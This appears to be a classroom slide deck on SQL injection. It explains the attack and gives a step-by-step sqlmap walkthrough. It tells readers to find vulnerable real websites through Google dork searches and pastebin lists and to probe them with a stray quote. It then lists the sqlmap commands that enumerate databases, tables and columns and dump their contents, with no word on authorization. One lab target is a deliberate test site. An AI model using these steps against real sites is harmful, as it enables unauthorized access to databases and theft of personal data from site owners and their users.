SQL Injection


Waqas Latif

What is SQL Injection

  • Injecting SQL code in database applications to dump/return the database.

How it works?

•For example:

  1. Websites takes user input from a form
  2. This user input is used literally in the construction of a SQL query submitted to a database.
  3. User sends SQL commands instead of the normal “input” through that form.
  4. SQL query responds hence successful Injection performed.

SQL Injection Risks

  • Adding new data to the database
  • Example eCommerce website selling incorrect items etc
  • Modifying data
  • Examples
  • eCommerce with super discounted items
  • Accessing Personal data on social networking websites
  • Gaining Admin Access
  • Server/ftp
  • Website
  • Database

How to do?

•Learn SQL! (pro way)


•Use prebuilt programs (SQLmap)

First Step: Finding a Vulnerable Website

  • Many ways to do this
  • Easiest way is to go on google.com and in search type
    • Index.php?’
    • Sql injectable websites pastebin 2015
  • At the end of the URL, put a ‘ and see if gives you any SQL errors/warning

Loading up SQLmap

  • Requires Python on your computer
  • Runs on windows/mac/linux
  • **If using Kali Linux you don’t need to cd to path of your sqlmap program**
  • Windows Users need to cd to the path of the sqlmap folder using cmd.

Loading up SQLmap

  • git clone:
    • https://github.com/sqlmapproject/sqlmap.git
  • Linux Server Access Using Putty/ssh:
    • cis-linux2.temple.edu
    • astro.temple.edu
  • Website we will be injecting:
    • http://testphp.acunetix.com/listproducts.php?cat=1

Common SQLmap parameters

  • -u: is for the URL
  • --dbs : is the option to get the database list from the injectable website
  • --tables : lists the tables in the SQL server
  • --columns : gets columns of a table in the database
  • --dump: dumps the database
  • -D: specific database you want data from
  • -T: specific table you want data from

SQLmap Commands

  • $ python sqlmap.py -u "http://www.site.com/section.php?id=51"
  • $ python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" –dbs
  • $ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D “specific database parameter”
  • $ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D “specific database parameter” -T “specific tables”
  • $ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D “specific database parameter” -T “specific tables”

The dump of the database can be found at

  • Linux: cd .sqlmap/
  • Windows: inside your sqlmap program directory in “output” folder
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